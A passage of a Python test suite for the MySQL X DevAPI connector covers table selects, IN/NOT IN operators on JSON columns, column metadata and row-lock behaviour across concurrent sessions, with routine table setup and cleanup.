self.session.sql("drop table if exists t1").execute()
@tests.foreach_session()
def test_table_select2(self):
"""Test the table.select with sort and limit."""
self.session.sql("drop table if exists t2").execute()
self.session.sql("create table t2(a int , b varchar(32))").execute()
table = self.schema.get_table("t2")
table.insert().values(1, "a").values(2, "c").values(3, "b").values(
4, "d"
).execute()
result = (
table.select("a").sort("b ASC").limit(2).execute()
) # sort() is deprecated since 8.0.12, use order_by()
row = result.fetch_all()
self.assertEqual(len(row), 2)
self.assertEqual(row[1]["a"], 3)
self.session.sql("drop table if exists t2").execute()
@tests.foreach_session()
def test_table_select3(self):
"""Test the table.select with bind."""
self.session.sql("drop table if exists t3").execute()
self.session.sql("create table t3(a int , b int)").execute()
table = self.schema.get_table("t3")
table.insert().values(1, 1).values(2, 1).values(3, 2).execute()
result = table.select("a").where("b== :b").bind("b", 1).execute()
row = result.fetch_all()
self.assertEqual(len(row), 2)
self.assertEqual(row[1]["a"], 2)
self.session.sql("drop table if exists t3").execute()
@tests.foreach_session()
def test_table_select4(self):
"""Test the table.select with no data."""
self.session.sql("drop table if exists t4").execute()
self.session.sql("create table t4(a int , b int)").execute()
table = self.schema.get_table("t4")
result = table.select("a").where("b== 1").execute()
row = result.fetch_all()
self.assertEqual(row, [])
self.session.sql("drop table if exists t4").execute()
@tests.foreach_session()
def test_table_select5(self):
"""Test the table.select on a invalid column."""
self.session.sql("drop table if exists t5").execute()
self.session.sql("create table t5(a int , b int)").execute()
table = self.schema.get_table("t5")
table.insert().values(1, 1).values(2, 1).values(3, 2).execute()
self.assertRaises(
mysqlx.OperationalError,
table.select("abc").execute,
)
self.session.sql("drop table if exists t5").execute()
@tests.foreach_session()
def test_table_select6(self):
"""Test the table.select."""
self.session.sql("drop table if exists t6").execute()
self.session.sql(
"create table t6(a int , name varchar(32),age int)"
).execute()
table = self.schema.get_table("t6")
table.insert().values(1, "a", 20).values(2, "a", 21).values(
3, "b", 34
).values(4, "b", 35).execute()
result = table.select().where("a > 1 and a < 4").execute()
row = result.fetch_all()
self.assertEqual(len(row), 2)
self.assertEqual(row[0]["name"], "a")
self.assertEqual(row[1]["name"], "b")
self.session.sql("drop table if exists t6").execute()
@tests.foreach_session()
def test_table_select7(self):
"""Test the table.select with group by."""
self.session.sql("drop table if exists t7").execute()
self.session.sql("set sql_mode=''").execute()
self.session.sql(
"create table t7(a int , name varchar(32),age int)"
).execute()
table = self.schema.get_table("t7")
table.insert().values(1, "a", 20).values(2, "a", 21).values(
3, "b", 34
).values(4, "b", 35).execute()
result = (
table.select()
.group_by("name")
.sort("age ASC")
.having("age > 30")
.execute()
)
row = result.fetch_all()
self.assertEqual(len(row), 1)
self.assertEqual(row[0]["age"], 34)
self.session.sql("drop table if exists t7").execute()
@tests.foreach_session()
def test_table_select8(self):
"""Test the table.select with param list."""
self.session.sql("drop table if exists t8").execute()
self.session.sql("create table t8(a int , b int, c int)").execute()
table = self.schema.get_table("t8")
table.insert().values(1, 3, 1).values(2, 1, 2).values(
3, 2, 3
).execute()
result = table.select("a", "b").where("c== 1").execute()
row = result.fetch_all()
self.assertEqual(row[0]["a"], 1)
self.assertEqual(row[0]["b"], 3)
self.session.sql("drop table if exists t8").execute()
@tests.foreach_session()
def test_table_select9(self):
"""Test the table.select with group by and param."""
self.session.sql("drop table if exists t9").execute()
self.session.sql("set sql_mode=''").execute()
self.session.sql("create table t9(a int , b int)").execute()
table = self.schema.get_table("t9")
table.insert().values(1, 10).values(1, 10).values(2, 20).values(
2, 30
).execute()
result = table.select("a", "b").group_by("a", "b").execute()
row = result.fetch_all()
self.assertEqual(row[0]["b"], 10)
self.assertEqual(row[2]["b"], 30)
self.session.sql("drop table if exists t9").execute()
@tests.foreach_session()
def test_table_select10(self):
self.session.sql("drop table if exists t10").execute()
self.session.sql("create table t10(a int , b int)").execute()
table = self.schema.get_table("t10")
table.insert().values(1, 10).values(1, 11).values(2, 10).values(
2, 11
).execute()
result = table.select("a", "b").sort("a ASC", "b DESC").execute()
row = result.fetch_all()
self.assertEqual(row[0]["b"], 11)
self.assertEqual(row[3]["b"], 10)
self.session.sql("drop table if exists t10").execute()
@tests.foreach_session()
def test_table_select11(self):
"""Test for bug25519251."""
self.session.sql("drop table if exists t11").execute()
self.session.sql(
"create table t11 (age INT, name VARCHAR(50))"
).execute()
self.session.sql("INSERT INTO t11 VALUES (21, 'Fred')").execute()
self.session.sql("INSERT INTO t11 VALUES (28, 'Barney')").execute()
self.session.sql("INSERT INTO t11 VALUES (42, 'Wilma')").execute()
self.session.sql("INSERT INTO t11 VALUES (67, 'Betty')").execute()
table = self.schema.get_table("t11")
result = table.select().order_by("age DESC").execute()
row = result.fetch_all()
self.assertEqual(row[0]["name"], "Betty")
self.assertEqual(row[3]["name"], "Fred")
self.session.sql("drop table if exists t11").execute()
@tests.foreach_session()
def test_table_select12(self):
"""Test table.select with limit() and offset() methods."""
self.session.sql("drop table if exists t12").execute()
self.session.sql("create table t12(a int , b int)").execute()
table = self.schema.get_table("t12")
table.insert().values(1, 10).values(1, 11).values(2, 10).values(
2, 11
).execute()
result = (
table.select("a", "b").limit(1, 1).execute()
) # limit(x,y) is deprecated since 8.0.12
row = result.fetch_all()
self.assertEqual(len(row), 1)
self.assertEqual(row[0]["b"], 11)
self.session.sql("drop table if exists t12").execute()
@tests.foreach_session()
def test_table_select13(self):
"""Test table.select with negative value to limit() method."""
self.session.sql("drop table if exists t13").execute()
self.session.sql("create table t13(a int , b int)").execute()
table = self.schema.get_table("t13")
table.insert().values(1, 10).values(1, 11).values(2, 10).values(
2, 11
).execute()
try:
table.select("a", "b").limit(-1).execute()
except ValueError:
# Expected a ValueError
pass
self.session.sql("drop table if exists t13").execute()
@tests.foreach_session()
def test_table_select14(self):
"""Test table.select with negative value to offset() method."""
self.session.sql("drop table if exists t14").execute()
self.session.sql("create table t14(a int , b int)").execute()
table = self.schema.get_table("t14")
table.insert().values(1, 10).values(1, 11).values(2, 10).values(
2, 11
).execute()
try:
result = table.select("a", "b").limit(2).offset(-1).execute()
except ValueError:
# Expected a ValueError
pass
self.session.sql("drop table if exists t14").execute()
@tests.foreach_session()
def test_table_select15(self):
"""Test get_columns()."""
self.session.sql("drop table if exists t15").execute()
self.session.sql(
"create table t15(a int , name varchar(32),age int)"
).execute()
table = self.schema.get_table("t15")
table.insert().values(1, "a", 20).values(2, "a", 21).values(
3, "b", 34
).values(4, "b", 35).execute()
result = table.select().where("a > 1 and a < 4").execute()
cols = result.get_columns()
self.session.sql("drop table if exists t15").execute()
@tests.foreach_session()
def test_table_select16(self):
"""Test new properties of Column."""
self.session.sql("drop table if exists t16").execute()
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql(
"create table t16(a int , name varchar(32),age int)"
).execute()
table = self.schema.get_table("t16")
table.insert().values(1, "a", 20).values(2, "a", 21).values(
3, "b", 34
).values(4, "b", 35).execute()
result = table.select().where("a > 1 and a < 4").execute()
cols = result.get_columns()
col0 = cols[0]
self.assertEqual(col0.schema_name, schema_name)
self.assertEqual(col0.table_name, "t16")
self.assertEqual(col0.table_label, "t16")
self.assertEqual(col0.column_name, "a")
self.assertEqual(col0.column_label, "a")
self.assertEqual(col0.type, mysqlx.ColumnType.INT)
self.assertEqual(col0.length, 11)
self.assertEqual(col0.fractional_digits, 0)
col1 = cols[1]
self.assertEqual(col1.schema_name, schema_name)
self.assertEqual(col1.table_name, "t16")
self.assertEqual(col1.table_label, "t16")
self.assertEqual(col1.column_name, "name")
self.assertEqual(col1.column_label, "name")
self.assertEqual(col1.type, mysqlx.ColumnType.STRING)
self.assertEqual(col1.collation_name, "utf8mb4_0900_ai_ci")
self.assertEqual(col1.character_set_name, "utf8mb4")
self.session.sql("drop table if exists t16").execute()
@tests.foreach_session()
def test_operator2(self):
"""Test unary operator not."""
self.session.sql("drop table if exists t1").execute()
self.session.sql("create table t1(a int, b boolean)").execute()
table = self.schema.get_table("t1")
table.insert().values(1, True).values(2, False).execute()
result = table.select("not b as b").where("a == 1").execute()
row = result.fetch_all()
self.assertEqual(row[0]["b"], 0)
self.session.sql("drop table if exists t1").execute()
@tests.foreach_session()
def test_operator3(self):
"""Test binary operator in."""
self.session.sql("drop table if exists t2").execute()
self.session.sql("create table t2(a int , b int)").execute()
table = self.schema.get_table("t2")
table.insert().values(1, 1).values(2, 2).execute()
result = table.select("2 IN (0,2,4,6)").execute()
result.fetch_all()
self.session.sql("drop table if exists t2").execute()
@tests.foreach_session()
def test_operator5(self):
self.session.sql("drop table if exists t3").execute()
self.session.sql("create table t3(data json)").execute()
table = self.schema.get_table("t3")
table.insert().values('{"_id":1,"age":20}').execute()
result = table.select("data->'$.age' as age").execute()
result.fetch_all()
self.session.sql("drop table if exists t3").execute()
# Testing the contains operator with single operand on both sides
@tests.foreach_session()
def test_contains_operator_select1(self):
"""Test IN operator with string on both sides - With LHS in RHS."""
self.session.sql("drop table if exists t1").execute()
self.session.sql("create table t1(a int , b int, c JSON)").execute()
table = self.schema.get_table("t1")
table.insert().values(1, 1, '{"comp":"abc"}').values(
2, 1, '{"comp":"pqr"}'
).values(3, 2, '{"comp":"xyz"}').execute()
result = table.select("a").where("'pqr' IN c->'$.comp'").execute()
row = result.fetch_all()
self.assertEqual(len(row), 1)
self.assertEqual(row[0]["a"], 2)
self.session.sql("drop table if exists t1").execute()
@tests.foreach_session()
def test_contains_operator_select2(self):
"""Test IN operator with int as operand - With LHS in RHS."""
self.session.sql("drop table if exists t2").execute()
self.session.sql(
"create table t2(name varchar(20) , a JSON, c varchar(20))"
).execute()
table = self.schema.get_table("t2")
table.insert().values("a", '{"age":21}', "abc").values(
"b", '{"age":31}', "pqr"
).values("hell", '{"age":22}', "xyz").execute()
result = table.select().where("a->$.age IN [21,31]").execute()
self.assertEqual(len(result.fetch_all()), 2)
self.session.sql("drop table if exists t2").execute()
@tests.foreach_session()
def test_contains_operator_select3(self):
"""Test IN operator with boolean as operand - With LHS in RHS."""
self.session.sql("drop table if exists t3").execute()
self.session.sql("create table t3(n JSON, a json, c JSON)").execute()
table = self.schema.get_table("t3")
table.insert().values(
'{"name":"joy"}', '{"age":18}', '{"comp":"abc"}'
).values('{"name":"happy"}', '{"age":21}', '{"comp":"pqr"}').values(
'{"name":"sad"}', '{"age":32}', '{"comp":"xyz"}'
).execute()
result = table.select().where("21 IN a->'$.age'").execute()
self.assertEqual(len(result.fetch_all()), 1)
self.session.sql("drop table if exists t3").execute()
@tests.foreach_session()
def test_contains_operator_select4(self):
"""Test NOT IN operator with string operand - With LHS not in RHS."""
self.session.sql("drop table if exists t4").execute()
self.session.sql("create table t4(n JSON, age int, c JSON)").execute()
table = self.schema.get_table("t4")
table.insert().values('{"name":"joy"}', 18, '{"comp":"abc"}').values(
'{"name":"happy"}', 21, '{"comp":"pqr"}'
).values('{"name":"sad"}', 32, '{"comp":"xyz"}').execute()
result = table.select().where("'happy' NOT IN n->'$.name'").execute()
self.assertEqual(len(result.fetch_all()), 2)
self.session.sql("drop table if exists t4").execute()
@tests.foreach_session()
def test_contains_operator_select5(self):
"""Test NOT IN operator with int as operand - With LHS not in RHS."""
self.session.sql("drop table if exists t5").execute()
self.session.sql("create table t5(n JSON, a JSON, c JSON)").execute()
table = self.schema.get_table("t5")
table.insert().values(
'{"name":"joy"}', '{"age":18}', '{"comp":"abc"}'
).values('{"name":"happy"}', '{"age":21}', '{"comp":"pqr"}').values(
'{"name":"sad"}', '{"age":32}', '{"comp":"xyz"}'
).execute()
result = table.select().where("21 NOT IN a->'$.age'").execute()
self.assertEqual(len(result.fetch_all()), 2)
self.session.sql("drop table if exists t5").execute()
@tests.foreach_session()
def test_contains_operator_select6(self):
"""Test NOT IN operator with boolean as operand - With LHS not in RHS."""
self.session.sql("drop table if exists t6").execute()
self.session.sql(
"create table t6(name varchar(20) , age int, c json)"
).execute()
table = self.schema.get_table("t6")
table.insert().values("a", 21, '{"comp":"pqr"}').values(
"b", 31, '{"comp":"xyz"}'
).values("e", 22, '{"comp":"xyz"}').execute()
result = table.select().where("c->'$.comp' IN ['pqr','abc']").execute()
self.assertEqual(len(result.fetch_all()), 1)
self.session.sql("drop table if exists t6").execute()
@tests.foreach_session()
def test_contains_operator_select7(self):
"""Test IN operator with different datatypes as operands."""
self.session.sql("drop table if exists t7").execute()
self.session.sql("create table t7(n JSON, a json, c JSON)").execute()
table = self.schema.get_table("t7")
table.insert().values(
'{"name":"joy"}', '{"age":18}', '{"comp":"abc"}'
).values('{"name":"happy"}', '{"age":21}', '{"comp":"pqr"}').values(
'{"name":"sad"}', '{"age":32}', '{"comp":"xyz"}'
).execute()
result = table.select().where("21 IN n->'$.name'").execute()
result1 = table.select().where("'b' IN a->$.age").limit(1).execute()
self.assertEqual(len(result.fetch_all()), 0)
self.assertEqual(len(result1.fetch_all()), 0)
self.session.sql("drop table if exists t7").execute()
@tests.foreach_session()
def test_contains_operator_select8(self):
"""Test IN operator with single element on LHS and array/list on RHS
and vice versa."""
self.session.sql("drop table if exists t8").execute()
self.session.sql(
"create table t8(id int, n JSON, a JSON, p JSON)"
).execute()
table = self.schema.get_table("t8")
table.insert().values(
1, '{"name":"a"}', '{"age":21}', '{"prof":["x","y"]}'
).values(2, '{"name":"b"}', '{"age":24}', '{"prof":["p","q"]}').values(
3, '{"name":"c"}', '{"age":26}', '{"prof":["l","m"]}'
).execute()
result = table.select().where("a->$.age IN [21,23,24,28]").execute()
result1 = (
table.select()
.where("n->'$.name' IN ['a','b','c','d','e']")
.execute()
)
result2 = table.select().where("a->$.age IN (21,23)").execute()
result3 = table.select().where("21 IN (22,23)").limit(1).execute()
result4 = table.select().where("['p','q'] IN p->'$.prof'").execute()
self.assertEqual(len(result.fetch_all()), 2)
self.assertEqual(len(result1.fetch_all()), 3)
self.assertEqual(len(result2.fetch_all()), 1)
self.assertEqual(len(result3.fetch_all()), 0)
self.assertEqual(len(result4.fetch_all()), 1)
self.session.sql("drop table if exists t8").execute()
@tests.foreach_session()
def test_contains_operator_select9(self):
"""Test IN operator with single element on LHS and dict on RHS and
vice versa."""
self.session.sql("drop table if exists t9").execute()
self.session.sql(
"create table t9(id int, name varchar(20), a JSON, ai JSON)"
).execute()
table = self.schema.get_table("t9")
table.insert().values(
1,
"a",
'{"age":23}',
'{"additionalinfo":["reading","music","playing"]}',
).values(
2, "b", '{"age":21}', '{"additionalinfo":["boxing","music"]}'
).execute()
result = (
table.select().where("'reading' IN ai->$.additionalinfo").execute()
)
result1 = table.select().where("'music' IN a->$.age").execute()
result2 = (
table.select().where("'music' IN ai->$.additionalinfo").execute()
)
self.assertEqual(len(result.fetch_all()), 1)
self.assertEqual(len(result1.fetch_all()), 0)
self.assertEqual(len(result2.fetch_all()), 2)
self.session.sql("drop table if exists t9").execute()
@tests.foreach_session()
def test_contains_operator_select10(self):
"""Test IN operator with array/list operand on LHS and array/list on
RHS."""
self.session.sql("drop table if exists t10").execute()
self.session.sql(
"create table t10(i JSON, n JSON, a JSON, ai JSON)"
).execute()
table = self.schema.get_table("t10")
table.insert().values(
'{"id":1}',
'{"name":"joy"}',
'{"age":21}',
'{"additionalinfo":["reading","music","playing"]}',
).values(
'{"id":2}',
'{"name":"happy"}',
'{"age":24}',
'{"additionalinfo":["playing","painting","boxing"]}',
).execute()
result = (
table.select()
.where("['playing','painting','boxing'] IN ai->'$.additionalinfo'")
.execute()
)
result1 = (
table.select()
.where('["happy","joy"] IN n->$.name')
.limit(1)
.execute()
)
result2 = (
table.select()
.where('["reading"] NOT IN ai->$.additionalinfo')
.limit(1)
.execute()
)
self.assertEqual(len(result.fetch_all()), 1)
self.assertEqual(len(result1.fetch_all()), 0)
self.assertEqual(len(result2.fetch_all()), 1)
self.session.sql("drop table if exists t10").execute()
@tests.foreach_session()
def test_contains_operator_select11(self):
"""Test IN operator with dict on LHS and dict on RHS."""
self.session.sql("drop table if exists t11").execute()
self.session.sql(
"create table t11(i JSON, n JSON, a JSON, ai JSON)"
).execute()
table = self.schema.get_table("t11")
table.insert().values(
'{"id":1}',
'{"name":"joy"}',
'{"age":21}',
'{"additionalinfo":[{"company":"xyz","vehicle":"bike"},{"company":"abc","vehicle":"car"},{"company":"mno","vehicle":"zeep"}]}',
).values(
'{"id":2}',
'{"name":"happy"}',
'{"age":24}',
'{"additionalinfo":[{"company":"abc","vehicle":"car"},{"company":"pqr","vehicle":"bicycle"}]}',
).execute()
result = table.select(
'{"company":"abc","vehicle":"car"} IN ai->"$.additionalinfo"'
).execute()
result1 = (
table.select()
.where('{"vehicle":"car"} NOT IN ai->"$.additionalinfo"')
.execute()
)
result2 = (
table.select()
.where('{"company":"mno"} IN ai->"$.additionalinfo"')
.execute()
)
self.assertEqual(len(result.fetch_all()), 2)
self.assertEqual(len(result1.fetch_all()), 0)
self.assertEqual(len(result2.fetch_all()), 1)
self.session.sql("drop table if exists t11").execute()
@tests.foreach_session()
def test_contains_operator_select12(self):
"""Test IN operator with operands having expressions."""
self.session.sql("drop table if exists t12").execute()
self.session.sql(
"create table t12(id int, name varchar(20), age int)"
).execute()
table = self.schema.get_table("t12")
table.insert().values(1, "a", 21).values(2, "b", 22).values(
3, "c", 32
).execute()
result = (
table.select().where("(1>5) IN (true, false)").limit(1).execute()
)
result1 = (
table.select()
.where("('a'>'b') in (true, false)")
.limit(1)
.execute()
)
result2 = (
table.select()
.where(
"true IN [(1>5), !(false), (true || false), (false && true)]"
)
.limit(1)
.execute()
)
self.assertEqual(len(result.fetch_all()), 1)
self.assertEqual(len(result1.fetch_all()), 1)
self.assertEqual(len(result2.fetch_all()), 1)
self.session.sql("drop table if exists t12").execute()
@tests.foreach_session()
def test_contains_operator_select13(self):
"""Test IN operator with operands having expressions."""
self.session.sql("drop table if exists t13").execute()
self.session.sql("create table t13(i json, n json, a json)").execute()
table = self.schema.get_table("t13")
table.insert().values('{"id":1}', '{"name":"a"}', '{"age":21}').values(
'{"id":2}', '{"name":"b"}', '{"age":22}'
).execute()
self.assertRaises(
mysqlx.OperationalError,
table.select().where("(1+5) IN [1,2,3,4,5,6]").execute,
)
table.select().where("(2+3) IN (1,2,3,4)").limit(1).execute()
self.session.sql("drop table if exists t13").execute()
@tests.foreach_session()
def test_contains_operator_select14(self):
"""Test IN operator: search for empty string in a field and field in
empty string."""
self.session.sql("drop table if exists t14").execute()
self.session.sql("create table t14(id int, n JSON, age int)").execute()
table = self.schema.get_table("t14")
table.insert().values(1, '{"name":"a"}', 21).values(
2, '{"name":"b"}', 22
).values(3, '{"name":"c"}', 32).execute()
result = table.select().where("'' IN n->'$.name'").execute()
result1 = table.select().where("n->'$.name' IN ['', ' ']").execute()
result2 = table.select().where("n->'$.name' IN ('', ' ')").execute()
self.assertEqual(len(result.fetch_all()), 0)
self.assertEqual(len(result1.fetch_all()), 0)
self.assertEqual(len(result2.fetch_all()), 0)
self.session.sql("drop table if exists t14").execute()
@tests.foreach_session()
def test_table_s_s_lock(self):
"""Test shared-shared lock."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t1").execute()
self.session.sql(
"create table t1(name varchar(20), age int)"
).execute()
table = self.schema.get_table("t1")
table.insert().values("Joe", 21).values("James", 23).execute()
locking = threading.Event()
waiting = threading.Event()
def thread_a(locking, waiting):
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table = schema1.get_table("t1")
session1.start_transaction()
table.select().where("name = 'James'").lock_shared().execute()
locking.set()
time.sleep(2)
locking.clear()
if waiting.is_set():
session1.commit()
self.fail(
"Table_S_S_Lock_test IS NOT OK. Other thread is waiting "
"while it is not expected to!"
)
session1.commit()
def thread_b(locking, waiting):
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table = schema2.get_table("t1")
if not locking.wait(2):
self.fail(
"Table_S_S_Lock_test IS NOT OK. Other thread has not set "
"the lock!"
)
session2.start_transaction()
waiting.set()
table.select().where("name = 'James'").lock_shared().execute()
waiting.clear()
session2.commit()
client1 = threading.Thread(
target=thread_a,
args=(
locking,
waiting,
),
)
client2 = threading.Thread(
target=thread_b,
args=(
locking,
waiting,
),
)
client1.start()
client2.start()
client1.join()
client2.join()
self.session.sql("drop table if exists t1").execute()
@tests.foreach_session()
def test_table_s_x_lock(self):
"""Test shared-exclusive lock."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t2").execute()
self.session.sql(
"create table t2(name varchar(20), age int)"
).execute()
table = self.schema.get_table("t2")
table.insert().values("Joe", 21).values("James", 23).execute()
locking = threading.Event()
waiting = threading.Event()
def thread_a(locking, waiting):
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table = schema1.get_table("t2")
session1.start_transaction()
table.select().where("name = 'James'").lock_shared().execute()
locking.set()
time.sleep(2)
locking.clear()
if not waiting.is_set():
session1.commit()
self.fail(
"Table_S_X_Lock_test IS NOT OK. Other thread is not "
"waiting while it is expected to!"
)
session1.commit()
def thread_b(locking, waiting):
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table = schema2.get_table("t2")
if not locking.wait(2):
self.fail(
"Table_S_X_Lock_test IS NOT OK. Other thread has not set "
"the lock!"
)
session2.start_transaction()
waiting.set()
table.select().where("name = 'James'").lock_exclusive().execute()
waiting.clear()
session2.commit()
client1 = threading.Thread(
target=thread_a,
args=(
locking,
waiting,
),
)
client2 = threading.Thread(
target=thread_b,
args=(
locking,
waiting,
),
)
client1.start()
client2.start()
client1.join()
client2.join()
self.session.sql("drop table if exists t2").execute()
@tests.foreach_session()
def test_table_x_x_lock(self):
"""Test clusive-exclusive lock."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t3").execute()
self.session.sql(
"create table t3(name varchar(20), age int)"
).execute()
table = self.schema.get_table("t3")
table.insert().values("Joe", 21).values("James", 23).execute()
locking = threading.Event()
waiting = threading.Event()
def thread_a(locking, waiting):
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table = schema1.get_table("t3")
session1.start_transaction()
table.select().where("name = 'James'").lock_exclusive().execute()
locking.set()
time.sleep(2)
locking.clear()
if not waiting.is_set():
session1.commit()
self.fail(
"Table_X_X_Lock_test IS NOT OK. Other thread is not "
"waiting while it is expected to!"
)
session1.commit()
def thread_b(locking, waiting):
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table = schema2.get_table("t3")
if not locking.wait(2):
self.fail(
"Table_X_X_Lock_test IS NOT OK. Other thread has not set "
"the lock!"
)
session2.start_transaction()
waiting.set()
table.select().where("name = 'James'").lock_exclusive().execute()
waiting.clear()
session2.commit()
client1 = threading.Thread(
target=thread_a,
args=(
locking,
waiting,
),
)
client2 = threading.Thread(
target=thread_b,
args=(
locking,
waiting,
),
)
client1.start()
client2.start()
client1.join()
client2.join()
self.session.sql("drop table if exists t3").execute()
@tests.foreach_session()
def test_table_x_s_lock(self):
"""Test exclusive-exclusive lock."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t4").execute()
self.session.sql(
"create table t4(name varchar(20), age int)"
).execute()
table = self.schema.get_table("t4")
table.insert().values("Joe", 21).values("James", 23).execute()
locking = threading.Event()
waiting = threading.Event()
def thread_a(locking, waiting):
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table = schema1.get_table("t4")
session1.start_transaction()
table.select().where("name = 'James'").lock_exclusive().execute()
locking.set()
time.sleep(2)
locking.clear()
if not waiting.is_set():
session1.commit()
self.fail(
"Table_X_S_Lock_test IS NOT OK. Other thread is not "
"waiting while it is expected to!"
)
session1.commit()
def thread_b(locking, waiting):
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table = schema2.get_table("t4")
if not locking.wait(2):
self.fail(
"Table_X_S_Lock_test IS NOT OK. Other thread has not set "
"the lock!"
)
session2.start_transaction()
waiting.set()
table.select().where("name = 'James'").lock_shared().execute()
waiting.clear()
session2.commit()
client1 = threading.Thread(
target=thread_a,
args=(
locking,
waiting,
),
)
client2 = threading.Thread(
target=thread_b,
args=(
locking,
waiting,
),
)
client1.start()
client2.start()
client1.join()
client2.join()
self.session.sql("drop table if exists t4").execute()
@tests.foreach_session()
def test_table_multiple_lock_calls(self):
"""Test multiple lock calls."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t5").execute()
self.session.sql(
"create table t5(name varchar(20), age int)"
).execute()
table = self.schema.get_table("t5")
table.insert().values("Joe", 21).values("James", 23).execute()
locking = threading.Event()
waiting = threading.Event()
def thread_a(locking, waiting):
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table = schema1.get_table("t5")
session1.start_transaction()
table.select().where(
"name = 'James'"
).lock_exclusive().lock_shared().lock_exclusive().execute()
locking.set()
time.sleep(2)
locking.clear()
if not waiting.is_set():
session1.commit()
self.fail(
"Table_Multiple_Lock_calls_test IS NOT OK. Other thread "
"is not waiting while it is expected to!"
)
session1.commit()
def thread_b(locking, waiting):
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table = schema2.get_table("t5")
if not locking.wait(2):
self.fail(
"Table_Multiple_Lock_calls_test IS NOT OK. Other thread "
"has not set the lock!"
)
session2.start_transaction()
waiting.set()
table.select().where(
"name = 'James'"
).lock_shared().lock_exclusive().lock_exclusive().lock_shared().execute()
waiting.clear()
session2.commit()
client1 = threading.Thread(
target=thread_a,
args=(
locking,
waiting,
),
)
client2 = threading.Thread(
target=thread_b,
args=(
locking,
waiting,
),
)
client1.start()
client2.start()
client1.join()
client2.join()
self.session.sql("drop table if exists t5").execute()
@tests.foreach_session()
def test_table_x_lock_update(self):
"""Test lock exclusive and update().where - update().where will be
blocked until the lock is released."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t6").execute()
self.session.sql(
"create table t6(name varchar(20), age int)"
).execute()
table = self.schema.get_table("t6")
table.insert().values("Joe", 21).values("James", 23).execute()
locking = threading.Event()
waiting = threading.Event()
def thread_a(locking, waiting):
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table = schema1.get_table("t6")
session1.start_transaction()
table.select().where(
"name = 'James'"
).lock_exclusive().lock_shared().lock_exclusive().execute()
locking.set()
time.sleep(2)
locking.clear()
if not waiting.is_set():
session1.commit()
self.fail(
"Table_X_Lock_Update_test IS NOT OK. Other thread is not "
"waiting while it is expected to!"
)
session1.commit()
def thread_b(locking, waiting):
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table = schema2.get_table("t6")
if not locking.wait(2):
self.fail(
"Table_X_Lock_Update_test IS NOT OK. Other thread has not "
"set the lock!"
)
session2.start_transaction()
waiting.set()
table.update().where("name == 'James'").set("age", 30).execute()
waiting.clear()
session2.commit()
client1 = threading.Thread(
target=thread_a,
args=(
locking,
waiting,
),
)
client2 = threading.Thread(
target=thread_b,
args=(
locking,
waiting,
),
)
client1.start()
client2.start()
client1.join()
client2.join()
self.session.sql("drop table if exists t6").execute()
@tests.foreach_session()
def test_table_s_lock_update(self):
"""Test lock shared and update().where - update().where will be blocked
until the lock is released, but will be able to read."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t7").execute()
self.session.sql(
"create table t7(name varchar(20), age int)"
).execute()
table = self.schema.get_table("t7")
table.insert().values("Joe", 21).values("James", 23).execute()
locking = threading.Event()
waiting = threading.Event()
def thread_a(locking, waiting):
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table = schema1.get_table("t7")
session1.start_transaction()
table.select().where(
"name = 'James'"
).lock_exclusive().lock_shared().execute()
locking.set()
time.sleep(2)
locking.clear()
if not waiting.is_set():
session1.commit()
self.fail(
"Table_S_Lock_Update_test IS NOT OK. Other thread is not "
"waiting while it is expected to!"
)
session1.commit()
def thread_b(locking, waiting):
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table = schema2.get_table("t7")
if not locking.wait(2):
self.fail(
"Table_S_Lock_Update_test IS NOT OK. Other thread has not "
"set the lock!"
)
session2.start_transaction()
result = table.select().where("name == 'James'").execute()
self.assertEqual(result.fetch_all()[0]["age"], 23)
waiting.set()
table.update().where("name == 'James'").set("age", 30).execute()
waiting.clear()
session2.commit()
client1 = threading.Thread(
target=thread_a,
args=(
locking,
waiting,
),
)
client2 = threading.Thread(
target=thread_b,
args=(
locking,
waiting,
),
)
client1.start()
client2.start()
client1.join()
client2.join()
self.session.sql("drop table if exists t7").execute()
@tests.foreach_session()
def test_table_s_s_nowait(self):
"""Test shared-shared with NOWAIT lockcontention."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t").execute()
self.session.sql("create table t(name varchar(20), age int)").execute()
table = self.schema.get_table("t")
table.insert().values("Joe", 21).values("James", 23).execute()
# `session2.lock_shared(NOWAIT) returns data immediately.
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table1 = schema1.get_table("t")
session1.start_transaction()
table1.select().where("name = 'James'").lock_shared().execute()
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table2 = schema2.get_table("t")
session2.start_transaction()
result = (
table2.select()
.where("name = 'James'")
.lock_shared(mysqlx.LockContention.NOWAIT)
.execute()
)
res = result.fetch_all()
self.assertEqual(len(res), 1)
self.assertEqual(res[0]["age"], 23)
session2.rollback()
session1.rollback()
self.session.sql("drop table if exists t").execute()
session2.close()
session1.close()
@tests.foreach_session()
def test_table_s_x_nowait(self):
"""Test shared-exclusive with NOWAIT lockcontention."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t").execute()
